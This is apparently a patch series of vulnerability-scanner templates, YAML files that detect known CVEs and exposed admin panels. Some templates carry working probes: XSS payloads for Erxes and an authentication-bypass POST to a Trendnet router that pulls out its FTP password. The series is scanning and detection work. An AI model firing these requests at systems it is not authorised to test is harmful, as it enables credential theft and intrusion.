a/cves/2014/CVE-2014-8682.yaml b/cves/2014/CVE-2014-8682.yaml index 25191e9b29..fcfe72ef06 100644 --- a/cves/2014/CVE-2014-8682.yaml +++ b/cves/2014/CVE-2014-8682.yaml @@ -5,17 +5,19 @@ info: author: dhiyaneshDK severity: high description: Multiple SQL injection vulnerabilities in Gogs (aka Go Git Service) 0.3.1-9 through 0.5.x before 0.5.6.1105 Beta allow remote attackers to execute arbitrary SQL commands via the q parameter to (1) api/v1/repos/search, which is not properly handled in models/repo.go, or (2) api/v1/users/search, which is not properly handled in models/user.go. - remediation: + remediation: Upgrade to a supported version of Gog. reference: - - http://www.securityfocus.com/bid/71187 - http://seclists.org/fulldisclosure/2014/Nov/33 - http://packetstormsecurity.com/files/129117/Gogs-Repository-Search-SQL-Injection.html - - http://gogs.io/docs/intro/change_log.html - https://github.com/gogits/gogs/commit/0c5ba4573aecc9eaed669e9431a70a5d9f184b8d - http://www.exploit-db.com/exploits/35238 - https://exchange.xforce.ibmcloud.com/vulnerabilities/98694 - - http://www.securityfocus.com/archive/1/533995/100/0/threaded tags: cve,cve2014,sqli,gogs + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H + cvss-score: 10.0 + cve-id: CVE-2014-8682 + cwe-id: CWE-89 metadata: shodan-query: 'title:"Sign In - Gogs"' @@ -36,4 +38,4 @@ requests: status: - 200 -# Enhanced by mp on 2022/02/01 +# Enhanced by cs on 2022/02/01 From 0d2500da981c8b6a26c937282e21d642aa1f2b06 Mon Sep 17 00:00:00 2001 From: sullo Date: Tue, 1 Feb 2022 16:57:47 -0500 Subject: [PATCH 21/49] Remove unnecessary comment --- workflows/joomla-workflow.yaml | 1 - 1 file changed, 1 deletion(-) diff --git a/workflows/joomla-workflow.yaml b/workflows/joomla-workflow.yaml index f9ab969abe..077185c1ca 100644 --- a/workflows/joomla-workflow.yaml +++ b/workflows/joomla-workflow.yaml @@ -11,4 +11,3 @@ workflows: - name: joomla subtemplates: - tags: joomla -# Enhanced by cs on 2022/01/31 From f42b5dc1768504f71fb6fc5967f3bb5c3f3d0cbe Mon Sep 17 00:00:00 2001 From: Roberto Nunes <46332131+Akokonunes@users.noreply.github.com> Date: Wed, 2 Feb 2022 12:43:39 +0900 Subject: [PATCH 22/49] Create CVE-2020-36365.yaml --- CVE-2020-36365.yaml | 28 ++++++++++++++++++++++++++++ 1 file changed, 28 insertions(+) create mode 100644 CVE-2020-36365.yaml diff --git a/CVE-2020-36365.yaml b/CVE-2020-36365.yaml new file mode 100644 index 0000000000..266c741657 --- /dev/null +++ b/CVE-2020-36365.yaml @@ -0,0 +1,28 @@ +id: CVE-2020-36365 + +info: + name: Smartstore < 4.1.0 - Open redirect + author: 0x_Akoko + severity: medium + description: Smartstore (aka SmartStoreNET) before 4.1.0 allows CommonController.ClearCache, ClearDatabaseCache, RestartApplication, and ScheduleTaskController.Edit open redirect. + reference: + - https://github.com/smartstore/SmartStoreNET/issues/2113 + - https://www.cvedetails.com/cve/CVE-2020-36365 + tags: cve,cve2020,redirect,smartstore + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.10 + cve-id: CVE-2020-36365 + cwe-id: CWE-601 + +requests: + - method: GET + + path: + - '{{BaseURL}}/backend/admin/common/clearcache?previousUrl=http://www.example.com' + + matchers: + - type: regex + regex: + - '(?m)^(?:Location\s*?:\s*?)(?:https?://|//)?(?:[a-zA-Z0-9\-_]*\.)?example\.com(?:\s*?)$' + part: header From 940db2f928a85036531b8ea6aa162d79ebb60676 Mon Sep 17 00:00:00 2001 From: Dwi Siswanto Date: Wed, 2 Feb 2022 13:27:36 +0700 Subject: [PATCH 23/49] Add CVE-2021-32853 --- cves/2021/CVE-2021-32853.yaml | 36 +++++++++++++++++++++++++++++++++++ 1 file changed, 36 insertions(+) create mode 100644 cves/2021/CVE-2021-32853.yaml diff --git a/cves/2021/CVE-2021-32853.yaml b/cves/2021/CVE-2021-32853.yaml new file mode 100644 index 0000000000..eb38bb272c --- /dev/null +++ b/cves/2021/CVE-2021-32853.yaml @@ -0,0 +1,36 @@ +id: CVE-2021-32853 + +info: + name: Erxes <= v0.23.0 XSS + author: dwisiswant0 + severity: medium + description: | + Erxes prior to version 0.23.0 is vulnerable to cross-site scripting. + The value of topicID parameter is not escaped & triggered in the + enclosing script tag. + reference: https://securitylab.github.com/advisories/GHSL-2021-103-erxes/ + tags: cve,cve2021,xss + +requests: + - method: GET + path: + - "{{BaseURL}}/widgets/knowledgebase?topicId=%22-alert(1)-%22" + - "{{BaseURL}}/widgets/knowledgebase?topicId=%3C%2Fscript%3E%3Cscript%3Ealert(1)%3C%2Fscript%3E" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + part: body + words: + - 'topic_id: ""-alert(1)-""' + - 'topic_id: ""' + condition: or + + - type: word + part: body + words: + - 'window.erxesEnv' \ No newline at end of file From 3ca0582495f8c67636031433dd773f58330a07ac Mon Sep 17 00:00:00 2001 From: Dominique RIGHETTO Date: Wed, 2 Feb 2022 09:18:15 +0100 Subject: [PATCH 24/49] Add template for Wallix Access Manager --- .../wallix-accessmanager-panel.yaml | 34 +++++++++++++++++++ 1 file changed, 34 insertions(+) create mode 100644 exposed-panels/wallix-accessmanager-panel.yaml diff --git a/exposed-panels/wallix-accessmanager-panel.yaml b/exposed-panels/wallix-accessmanager-panel.yaml new file mode 100644 index 0000000000..93c952da71 --- /dev/null +++ b/exposed-panels/wallix-accessmanager-panel.yaml @@ -0,0 +1,34 @@ +id: wallix-accessmanager + +info: + name: Wallix Access Manager + author: righettod + severity: info + reference: + - https://www.wallix.com/privileged-access-management/access-manager/ + - https://www.shodan.io/search?query=http.title%3A%22Wallix+Access+Manager%22 + tags: panel,wallix + +requests: + - method: GET + path: + - '{{BaseURL}}/wabam' + - '{{BaseURL}}/wabam/favicon.ico' + + stop-at-first-match: true + redirects: true + max-redirects: 5 + matchers-condition: or + matchers: + + - type: dsl + dsl: + - "status_code==200" + - "contains(tolower(body), 'wallix access manager')" + condition: and + + - type: dsl + dsl: + - "status_code==200" + - "('1745235488' == mmh3(base64_py(body)))" + condition: and \ No newline at end of file From ac215b3b03c3945a0360db74267f73744b272e5e Mon Sep 17 00:00:00 2001 From: Dominique RIGHETTO Date: Wed, 2 Feb 2022 09:24:54 +0100 Subject: [PATCH 25/49] Fix linter error --- exposed-panels/wallix-accessmanager-panel.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/exposed-panels/wallix-accessmanager-panel.yaml b/exposed-panels/wallix-accessmanager-panel.yaml index 93c952da71..eb7d109d0e 100644 --- a/exposed-panels/wallix-accessmanager-panel.yaml +++ b/exposed-panels/wallix-accessmanager-panel.yaml @@ -31,4 +31,4 @@ requests: dsl: - "status_code==200" - "('1745235488' == mmh3(base64_py(body)))" - condition: and \ No newline at end of file + condition: and From 633205a001fd32eb8207d6e1d97ced8ae9435d1c Mon Sep 17 00:00:00 2001 From: Sandeep Singh Date: Wed, 2 Feb 2022 13:56:12 +0530 Subject: [PATCH 26/49] Update CVE-2021-32853.yaml --- cves/2021/CVE-2021-32853.yaml | 8 ++++---- 1 file changed, 4 insertions(+), 4 deletions(-) diff --git a/cves/2021/CVE-2021-32853.yaml b/cves/2021/CVE-2021-32853.yaml index eb38bb272c..d13f138f5a 100644 --- a/cves/2021/CVE-2021-32853.yaml +++ b/cves/2021/CVE-2021-32853.yaml @@ -5,11 +5,11 @@ info: author: dwisiswant0 severity: medium description: | - Erxes prior to version 0.23.0 is vulnerable to cross-site scripting. - The value of topicID parameter is not escaped & triggered in the + Erxes prior to version 0.23.0 is vulnerable to cross-site scripting. + The value of topicID parameter is not escaped & triggered in the enclosing script tag. reference: https://securitylab.github.com/advisories/GHSL-2021-103-erxes/ - tags: cve,cve2021,xss + tags: cve,cve2021,xss,erxes,oss requests: - method: GET @@ -33,4 +33,4 @@ requests: - type: word part: body words: - - 'window.erxesEnv' \ No newline at end of file + - 'window.erxesEnv' From 93b246e22d2e5cab7a997b367e27050545dab6f4 Mon Sep 17 00:00:00 2001 From: Dominique RIGHETTO Date: Wed, 2 Feb 2022 09:26:43 +0100 Subject: [PATCH 27/49] Fix linter error --- exposed-panels/wallix-accessmanager-panel.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/exposed-panels/wallix-accessmanager-panel.yaml b/exposed-panels/wallix-accessmanager-panel.yaml index eb7d109d0e..8a4af3d0dd 100644 --- a/exposed-panels/wallix-accessmanager-panel.yaml +++ b/exposed-panels/wallix-accessmanager-panel.yaml @@ -4,7 +4,7 @@ info: name: Wallix Access Manager author: righettod severity: info - reference: + reference: - https://www.wallix.com/privileged-access-management/access-manager/ - https://www.shodan.io/search?query=http.title%3A%22Wallix+Access+Manager%22 tags: panel,wallix From 9a5ffc121e6c290371bdf391cbc7d504262a3ec0 Mon Sep 17 00:00:00 2001 From: Dominique RIGHETTO Date: Wed, 2 Feb 2022 16:31:30 +0100 Subject: [PATCH 28/49] Add detection for the MSP version --- exposed-panels/zoho/manageengine-servicedesk.yaml | 7 +++++-- 1 file changed, 5 insertions(+), 2 deletions(-) diff --git a/exposed-panels/zoho/manageengine-servicedesk.yaml b/exposed-panels/zoho/manageengine-servicedesk.yaml index eaf03fbc08..50bcd2c22a 100644 --- a/exposed-panels/zoho/manageengine-servicedesk.yaml +++ b/exposed-panels/zoho/manageengine-servicedesk.yaml @@ -2,9 +2,11 @@ id: manageengine-servicedesk info: name: ZOHO ManageEngine ServiceDesk - author: dhiyaneshDK + author: dhiyaneshDK,righettod severity: info - reference: https://www.shodan.io/search?query=http.title%3A%22ManageEngine+ServiceDesk+Plus%22 + reference: + - https://www.shodan.io/search?query=http.title%3A%22ManageEngine+ServiceDesk+Plus%22 + - https://www.shodan.io/search?query=http.title%3A%22ManageEngine+ServiceDesk+Plus+-+MSP%22 tags: panel,zoho,manageengine requests: @@ -17,6 +19,7 @@ requests: - type: word words: - 'ManageEngine ServiceDesk Plus' + - 'ManageEngine ServiceDesk Plus - MSP' - type: status status: From 83bb5912feac9d87334cc3708d9e2f8b177e623e Mon Sep 17 00:00:00 2001 From: 6d616461 Date: Wed, 2 Feb 2022 17:47:13 +0100 Subject: [PATCH 29/49] Updated CVE-2019-9618 Template --- cves/2019/CVE-2019-9618.yaml | 1 + 1 file changed, 1 insertion(+) diff --git a/cves/2019/CVE-2019-9618.yaml b/cves/2019/CVE-2019-9618.yaml index 58167af430..af204d6919 100644 --- a/cves/2019/CVE-2019-9618.yaml +++ b/cves/2019/CVE-2019-9618.yaml @@ -31,3 +31,4 @@ requests: - type: status status: - 200 + - 500 From 0c1fb1e69757b459ed3217d67781f7a9bbeb4205 Mon Sep 17 00:00:00 2001 From: 6d616461 Date: Wed, 2 Feb 2022 18:36:24 +0100 Subject: [PATCH 30/49] Updated CVE-2016-10956 Template --- cves/2016/CVE-2016-10956.yaml | 1 + 1 file changed, 1 insertion(+) diff --git a/cves/2016/CVE-2016-10956.yaml b/cves/2016/CVE-2016-10956.yaml index 0d3a7bd668..415c6b87c8 100644 --- a/cves/2016/CVE-2016-10956.yaml +++ b/cves/2016/CVE-2016-10956.yaml @@ -30,3 +30,4 @@ requests: - type: status status: - 200 + - 500 From 7b2f90753bdb79121da3fc2958964d5044b65748 Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Thu, 3 Feb 2022 01:51:49 +0530 Subject: [PATCH 31/49] Update wallix-accessmanager-panel.yaml --- exposed-panels/wallix-accessmanager-panel.yaml | 13 ++++++------- 1 file changed, 6 insertions(+), 7 deletions(-) diff --git a/exposed-panels/wallix-accessmanager-panel.yaml b/exposed-panels/wallix-accessmanager-panel.yaml index 8a4af3d0dd..d6f8e7d313 100644 --- a/exposed-panels/wallix-accessmanager-panel.yaml +++ b/exposed-panels/wallix-accessmanager-panel.yaml @@ -1,12 +1,12 @@ -id: wallix-accessmanager +id: wallix-accessmanager-panel info: - name: Wallix Access Manager + name: Wallix Access Manager Panel author: righettod severity: info - reference: - - https://www.wallix.com/privileged-access-management/access-manager/ - - https://www.shodan.io/search?query=http.title%3A%22Wallix+Access+Manager%22 + reference: https://www.wallix.com/privileged-access-management/access-manager/ + metadata: + shodan-query: http.title:"Wallix Access Manager" tags: panel,wallix requests: @@ -17,10 +17,9 @@ requests: stop-at-first-match: true redirects: true - max-redirects: 5 + max-redirects: 3 matchers-condition: or matchers: - - type: dsl dsl: - "status_code==200" From 110704dd3e1af363ca7b03c36cafd075eb3c89bd Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Thu, 3 Feb 2022 02:01:24 +0530 Subject: [PATCH 32/49] Update CVE-2021-32853.yaml --- cves/2021/CVE-2021-32853.yaml | 36 +++++++++++++++++------------------ 1 file changed, 17 insertions(+), 19 deletions(-) diff --git a/cves/2021/CVE-2021-32853.yaml b/cves/2021/CVE-2021-32853.yaml index d13f138f5a..08e567143f 100644 --- a/cves/2021/CVE-2021-32853.yaml +++ b/cves/2021/CVE-2021-32853.yaml @@ -4,33 +4,31 @@ info: name: Erxes <= v0.23.0 XSS author: dwisiswant0 severity: medium - description: | - Erxes prior to version 0.23.0 is vulnerable to cross-site scripting. - The value of topicID parameter is not escaped & triggered in the - enclosing script tag. - reference: https://securitylab.github.com/advisories/GHSL-2021-103-erxes/ + description: Erxes prior to version 0.23.0 is vulnerable to cross-site scripting.The value of topicID parameter is not escaped & triggered in the enclosing script tag. + reference: + - https://securitylab.github.com/advisories/GHSL-2021-103-erxes/ + - https://nvd.nist.gov/vuln/detail/CVE-2021-3285 tags: cve,cve2021,xss,erxes,oss requests: - method: GET path: - - "{{BaseURL}}/widgets/knowledgebase?topicId=%22-alert(1)-%22" - - "{{BaseURL}}/widgets/knowledgebase?topicId=%3C%2Fscript%3E%3Cscript%3Ealert(1)%3C%2Fscript%3E" + - "{{BaseURL}}/widgets/knowledgebase?topicId=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E" matchers-condition: and matchers: + - type: word + part: body + words: + - "" + - "window.erxesEnv" + condition: and + + - type: word + part: header + words: + - text/html + - type: status status: - 200 - - - type: word - part: body - words: - - 'topic_id: ""-alert(1)-""' - - 'topic_id: ""' - condition: or - - - type: word - part: body - words: - - 'window.erxesEnv' From 9f63a2f4fb68a12496360d85d5e193237ea5e6d2 Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Thu, 3 Feb 2022 02:06:26 +0530 Subject: [PATCH 33/49] Update CVE-2021-32853.yaml --- cves/2021/CVE-2021-32853.yaml | 2 ++ 1 file changed, 2 insertions(+) diff --git a/cves/2021/CVE-2021-32853.yaml b/cves/2021/CVE-2021-32853.yaml index 08e567143f..90738a22c6 100644 --- a/cves/2021/CVE-2021-32853.yaml +++ b/cves/2021/CVE-2021-32853.yaml @@ -8,6 +8,8 @@ info: reference: - https://securitylab.github.com/advisories/GHSL-2021-103-erxes/ - https://nvd.nist.gov/vuln/detail/CVE-2021-3285 + metadata: + shodan-query: http.title:"erxes" tags: cve,cve2021,xss,erxes,oss requests: From 9decb6c1199a30749833c06fa07981beadce9e86 Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Thu, 3 Feb 2022 02:09:01 +0530 Subject: [PATCH 34/49] Create erxes-detect.yaml --- technologies/erxes-detect.yaml | 25 +++++++++++++++++++++++++ 1 file changed, 25 insertions(+) create mode 100644 technologies/erxes-detect.yaml diff --git a/technologies/erxes-detect.yaml b/technologies/erxes-detect.yaml new file mode 100644 index 0000000000..5d27efeaeb --- /dev/null +++ b/technologies/erxes-detect.yaml @@ -0,0 +1,25 @@ +id: erxes-detect + +info: + name: Erxes Detect + author: princechaddha + severity: info + metadata: + shodan-query: http.title:"erxes" + tags: tech,erxes + +requests: + - method: GET + path: + - "{{BaseURL}}" + + matchers-condition: and + matchers: + - type: regex + part: body + regex: + - "erxes(.*)" + + - type: status + status: + - 200 From b023c8206e07b56609a07fec49a0a63fc55178ee Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Thu, 3 Feb 2022 02:14:21 +0530 Subject: [PATCH 35/49] Update CVE-2021-32853.yaml --- cves/2021/CVE-2021-32853.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/cves/2021/CVE-2021-32853.yaml b/cves/2021/CVE-2021-32853.yaml index 90738a22c6..ff1a4f5426 100644 --- a/cves/2021/CVE-2021-32853.yaml +++ b/cves/2021/CVE-2021-32853.yaml @@ -22,7 +22,7 @@ requests: - type: word part: body words: - - "" + - 'topic_id: "' - "window.erxesEnv" condition: and From 0e6a797abaa3764cb52c9979851bd07d60f18402 Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Thu, 3 Feb 2022 02:37:27 +0530 Subject: [PATCH 36/49] Create smartstore-detect.yaml --- technologies/smartstore-detect.yaml | 33 +++++++++++++++++++++++++++++ 1 file changed, 33 insertions(+) create mode 100644 technologies/smartstore-detect.yaml diff --git a/technologies/smartstore-detect.yaml b/technologies/smartstore-detect.yaml new file mode 100644 index 0000000000..d23f0b1114 --- /dev/null +++ b/technologies/smartstore-detect.yaml @@ -0,0 +1,33 @@ +id: smartstore-detect + +info: + name: SmartStoreNET Detect + author: princechaddha + severity: info + metadata: + shodan-query: http.html:'content="Smartstore' + tags: tech,smartstorenet,oos + +requests: + - method: GET + path: + - "{{BaseURL}}" + + matchers-condition: and + matchers: + + - type: regex + part: body + regex: + - '' + + - type: status + status: + - 200 + + extractors: + - type: regex + part: body + group: 1 + regex: + - '' From 01f44b267594867780117e37498adf866481cb6f Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Thu, 3 Feb 2022 02:39:14 +0530 Subject: [PATCH 37/49] Update smartstore-detect.yaml --- technologies/smartstore-detect.yaml | 5 +++-- 1 file changed, 3 insertions(+), 2 deletions(-) diff --git a/technologies/smartstore-detect.yaml b/technologies/smartstore-detect.yaml index d23f0b1114..422d7c915a 100644 --- a/technologies/smartstore-detect.yaml +++ b/technologies/smartstore-detect.yaml @@ -1,12 +1,13 @@ id: smartstore-detect info: - name: SmartStoreNET Detect + name: SmartStore Detect author: princechaddha severity: info + reference: https://github.com/smartstore/SmartStoreNET metadata: shodan-query: http.html:'content="Smartstore' - tags: tech,smartstorenet,oos + tags: tech,smartstore,oos requests: - method: GET From 42bc9418274ff6e67b3a3effa9de3280a348ed6a Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Thu, 3 Feb 2022 02:39:33 +0530 Subject: [PATCH 38/49] Update and rename CVE-2020-36365.yaml to cves/2020/CVE-2020-36365.yaml --- CVE-2020-36365.yaml => cves/2020/CVE-2020-36365.yaml | 9 ++++++--- 1 file changed, 6 insertions(+), 3 deletions(-) rename CVE-2020-36365.yaml => cves/2020/CVE-2020-36365.yaml (74%) diff --git a/CVE-2020-36365.yaml b/cves/2020/CVE-2020-36365.yaml similarity index 74% rename from CVE-2020-36365.yaml rename to cves/2020/CVE-2020-36365.yaml index 266c741657..771c887368 100644 --- a/CVE-2020-36365.yaml +++ b/cves/2020/CVE-2020-36365.yaml @@ -8,12 +8,15 @@ info: reference: - https://github.com/smartstore/SmartStoreNET/issues/2113 - https://www.cvedetails.com/cve/CVE-2020-36365 - tags: cve,cve2020,redirect,smartstore + - https://github.com/smartstore/SmartStoreNET classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N cvss-score: 6.10 cve-id: CVE-2020-36365 cwe-id: CWE-601 + metadata: + shodan-query: http.html:'content="Smartstore' + tags: cve,cve2020,redirect,smartstore requests: - method: GET @@ -23,6 +26,6 @@ requests: matchers: - type: regex - regex: - - '(?m)^(?:Location\s*?:\s*?)(?:https?://|//)?(?:[a-zA-Z0-9\-_]*\.)?example\.com(?:\s*?)$' part: header + regex: + - '(?m)^(?:Location\s*?:\s*?)(?:https?:\/\/|\/\/|\/\\\\|\/\\)?(?:[a-zA-Z0-9\-_\.@]*)example\.com\/?(\/|[^.].*)?$' # https://regex101.com/r/ZDYhFh/1 From c727898abe4c297924e98358763b6fc180efa592 Mon Sep 17 00:00:00 2001 From: Dwi Siswanto Date: Thu, 3 Feb 2022 12:15:15 +0700 Subject: [PATCH 39/49] update: addeventlistener-detect --- miscellaneous/addeventlistener-detect.yaml | 12 ++++++------ 1 file changed, 6 insertions(+), 6 deletions(-) diff --git a/miscellaneous/addeventlistener-detect.yaml b/miscellaneous/addeventlistener-detect.yaml index fb29b8ba5a..c1bc920d1c 100644 --- a/miscellaneous/addeventlistener-detect.yaml +++ b/miscellaneous/addeventlistener-detect.yaml @@ -1,8 +1,8 @@ id: addeventlistener-detect info: - name: AddEventlistener detection - author: yavolo + name: DOM EventListener detection + author: yavolo, dwisiswant0 severity: info tags: xss,misc reference: https://portswigger.net/web-security/dom-based/controlling-the-web-message-source @@ -10,10 +10,10 @@ info: requests: - method: GET path: - - '{{BaseURL}}' + - "{{BaseURL}}" matchers: - - type: word + - type: regex part: body - words: - - 'window.addEventListener(' + regex: + - (([\w\_]+)\.)?add[Ee]vent[Ll]istener\(["']?[\w\_]+["']? # Test cases: https://www.regextester.com/?fam=121118 \ No newline at end of file From bc87c82d9b7c61c146d6cdeb6573156feacf224c Mon Sep 17 00:00:00 2001 From: GwanYeong Kim Date: Thu, 3 Feb 2022 18:06:04 +0900 Subject: [PATCH 40/49] Create CVE-2021-20150.yaml Trendnet AC2600 TEW-827DRU version 2.08B01 improperly discloses information via redirection from the setup wizard. Authentication can be bypassed and a user may view information as Admin by manually browsing to the setup wizard and forcing it to redirect to the desired page. Signed-off-by: GwanYeong Kim --- cves/2021/CVE-2021-20150.yaml | 46 +++++++++++++++++++++++++++++++++++ 1 file changed, 46 insertions(+) create mode 100644 cves/2021/CVE-2021-20150.yaml diff --git a/cves/2021/CVE-2021-20150.yaml b/cves/2021/CVE-2021-20150.yaml new file mode 100644 index 0000000000..abc45e5c1b --- /dev/null +++ b/cves/2021/CVE-2021-20150.yaml @@ -0,0 +1,46 @@ +id: CVE-2021-20150 + +info: + name: Trendnet AC2600 TEW-827DRU - Credentials Disclosure + author: gy741 + severity: medium + description: Trendnet AC2600 TEW-827DRU version 2.08B01 improperly discloses information via redirection from the setup wizard. Authentication can be bypassed and a user may view information as Admin by manually browsing to the setup wizard and forcing it to redirect to the desired page. + reference: + - https://nvd.nist.gov/vuln/detail/CVE-2021-20150 + - https://www.tenable.com/security/research/tra-2021-54 + tags: cve,cve2021,trendnet,disclosure + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 5.30 + cve-id: CVE-2021-20150 + cwe-id: CWE-287 + +requests: + - raw: + - | + POST /apply_sec.cgi HTTP/1.1 + Host: {{Hostname}} + Origin: http://{{Hostname}} + Referer: http://{{Hostname}}/setup_wizard.asp + Cookie: compact_display_state=false + + action=setup_wizard_cancel&html_response_page=ftpserver.asp&html_response_return_page=ftpserver.asp + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + part: body + words: + - 'ftp_username' + - 'ftp_password' + - 'ftp_permission' + condition: and + + - type: word + part: header + words: + - "text/html" From d2e4be88e641d28cc5fc51fd3502c17505440fc7 Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Fri, 4 Feb 2022 01:13:00 +0530 Subject: [PATCH 41/49] Update CVE-2021-20150.yaml --- cves/2021/CVE-2021-20150.yaml | 13 +++++++++++-- 1 file changed, 11 insertions(+), 2 deletions(-) diff --git a/cves/2021/CVE-2021-20150.yaml b/cves/2021/CVE-2021-20150.yaml index abc45e5c1b..cffd81953a 100644 --- a/cves/2021/CVE-2021-20150.yaml +++ b/cves/2021/CVE-2021-20150.yaml @@ -6,14 +6,14 @@ info: severity: medium description: Trendnet AC2600 TEW-827DRU version 2.08B01 improperly discloses information via redirection from the setup wizard. Authentication can be bypassed and a user may view information as Admin by manually browsing to the setup wizard and forcing it to redirect to the desired page. reference: - - https://nvd.nist.gov/vuln/detail/CVE-2021-20150 - https://www.tenable.com/security/research/tra-2021-54 - tags: cve,cve2021,trendnet,disclosure + - https://nvd.nist.gov/vuln/detail/CVE-2021-20150 classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 5.30 cve-id: CVE-2021-20150 cwe-id: CWE-287 + tags: cve,cve2021,trendnet,disclosure,router requests: - raw: @@ -38,9 +38,18 @@ requests: - 'ftp_username' - 'ftp_password' - 'ftp_permission' + - 'TEW-827DRU' condition: and - type: word part: header words: - "text/html" + + extractors: + - type: regex + part: body + name: password + group: 1 + regex: + - '' From f846faa127ab577b507288d6154484cc3ebf3339 Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Fri, 4 Feb 2022 01:13:30 +0530 Subject: [PATCH 42/49] Update CVE-2021-20150.yaml --- cves/2021/CVE-2021-20150.yaml | 2 ++ 1 file changed, 2 insertions(+) diff --git a/cves/2021/CVE-2021-20150.yaml b/cves/2021/CVE-2021-20150.yaml index cffd81953a..28a748db64 100644 --- a/cves/2021/CVE-2021-20150.yaml +++ b/cves/2021/CVE-2021-20150.yaml @@ -13,6 +13,8 @@ info: cvss-score: 5.30 cve-id: CVE-2021-20150 cwe-id: CWE-287 + metadata: + shodan-query: http.html:"TEW-827DRU" tags: cve,cve2021,trendnet,disclosure,router requests: From 9781a16c7f42b67ad30270cb2650a49a73922273 Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Fri, 4 Feb 2022 01:18:44 +0530 Subject: [PATCH 43/49] Create trendnet-tew827dru-login.yaml --- .../trendnet/trendnet-tew827dru-login.yaml | 25 +++++++++++++++++++ 1 file changed, 25 insertions(+) create mode 100644 exposed-panels/trendnet/trendnet-tew827dru-login.yaml diff --git a/exposed-panels/trendnet/trendnet-tew827dru-login.yaml b/exposed-panels/trendnet/trendnet-tew827dru-login.yaml new file mode 100644 index 0000000000..c65b44c8b8 --- /dev/null +++ b/exposed-panels/trendnet/trendnet-tew827dru-login.yaml @@ -0,0 +1,25 @@ +id: trendnet-tew827dru-login + +info: + name: TRENDnet TEW-827DRU Login + author: princechaddha + severity: info + metadata: + shodan-query: http.html:"TEW-827DRU" + tags: panel,router,trendnet + +requests: + - method: GET + path: + - "{{BaseURL}}" + + matchers-condition: and + matchers: + - type: word + part: body + words: + - 'var model = "TEW-827DRU";' + + - type: status + status: + - 200 From 480dea094b5451b209995c01cbd4f5b70fc04095 Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Fri, 4 Feb 2022 01:20:39 +0530 Subject: [PATCH 44/49] Update CVE-2021-20150.yaml --- cves/2021/CVE-2021-20150.yaml | 3 --- 1 file changed, 3 deletions(-) diff --git a/cves/2021/CVE-2021-20150.yaml b/cves/2021/CVE-2021-20150.yaml index 28a748db64..ca4d6b7f51 100644 --- a/cves/2021/CVE-2021-20150.yaml +++ b/cves/2021/CVE-2021-20150.yaml @@ -22,9 +22,6 @@ requests: - | POST /apply_sec.cgi HTTP/1.1 Host: {{Hostname}} - Origin: http://{{Hostname}} - Referer: http://{{Hostname}}/setup_wizard.asp - Cookie: compact_display_state=false action=setup_wizard_cancel&html_response_page=ftpserver.asp&html_response_return_page=ftpserver.asp From 22618fe6513f2bf511c896712c3907a3e944a96d Mon Sep 17 00:00:00 2001 From: idealphase Date: Fri, 4 Feb 2022 12:09:44 +0700 Subject: [PATCH 45/49] Add cisco-ucs-kvm-direct-login.yaml Add cisco-ucs-kvm-direct-login.yaml --- .../cisco/cisco-ucs-kvm-direct-login.yaml | 26 +++++++++++++++++++ 1 file changed, 26 insertions(+) create mode 100644 exposed-panels/cisco/cisco-ucs-kvm-direct-login.yaml diff --git a/exposed-panels/cisco/cisco-ucs-kvm-direct-login.yaml b/exposed-panels/cisco/cisco-ucs-kvm-direct-login.yaml new file mode 100644 index 0000000000..d4318f76ab --- /dev/null +++ b/exposed-panels/cisco/cisco-ucs-kvm-direct-login.yaml @@ -0,0 +1,26 @@ +id: cisco-ucs-kvm-direct-login + +info: + name: Cisco UCS KVM Direct Login + author: idealphase + severity: info + description: The KVM console is an interface accessible from the Cisco UCS Manager GUI or the KVM Launch Manager that emulates a direct KVM connection. Unlike the KVM dongle, which requires you to be physically connected to the server, the KVM console allows you to connect to the server from a remote location across the network. + reference: https://www.cisco.com/c/en/us/td/docs/unified_computing/ucs/ucs-manager/GUI-User-Guides/Admin-Management/3-1/b_Cisco_UCS_Admin_Mgmt_Guide_3_1/b_Cisco_UCSM_GUI_Admin_Mgmt_Guide_3_1_chapter_01111.html + tags: panel,cisco + metadata: + shodan-query: 'http.title:"Cisco UCS KVM Direct"' + +requests: + - method: GET + path: + - '{{BaseURL}}' + + matchers-condition: and + matchers: + - type: word + words: + - 'Cisco UCS KVM Direct' + + - type: status + status: + - 200 From fcc39f52ee775355d9d199d17b77817de0a6ccd4 Mon Sep 17 00:00:00 2001 From: GwanYeong Kim Date: Sat, 5 Feb 2022 01:29:16 +0900 Subject: [PATCH 46/49] Create CVE-2021-20158.yaml Trendnet AC2600 TEW-827DRU version 2.08B01 contains an authentication bypass vulnerability. It is possible for an unauthenticated, malicous actor to force the change of the admin password due to a hidden administrative command. Signed-off-by: GwanYeong Kim --- cves/2021/CVE-2021-20158.yaml | 59 +++++++++++++++++++++++++++++++++++ 1 file changed, 59 insertions(+) create mode 100644 cves/2021/CVE-2021-20158.yaml diff --git a/cves/2021/CVE-2021-20158.yaml b/cves/2021/CVE-2021-20158.yaml new file mode 100644 index 0000000000..85c33d0745 --- /dev/null +++ 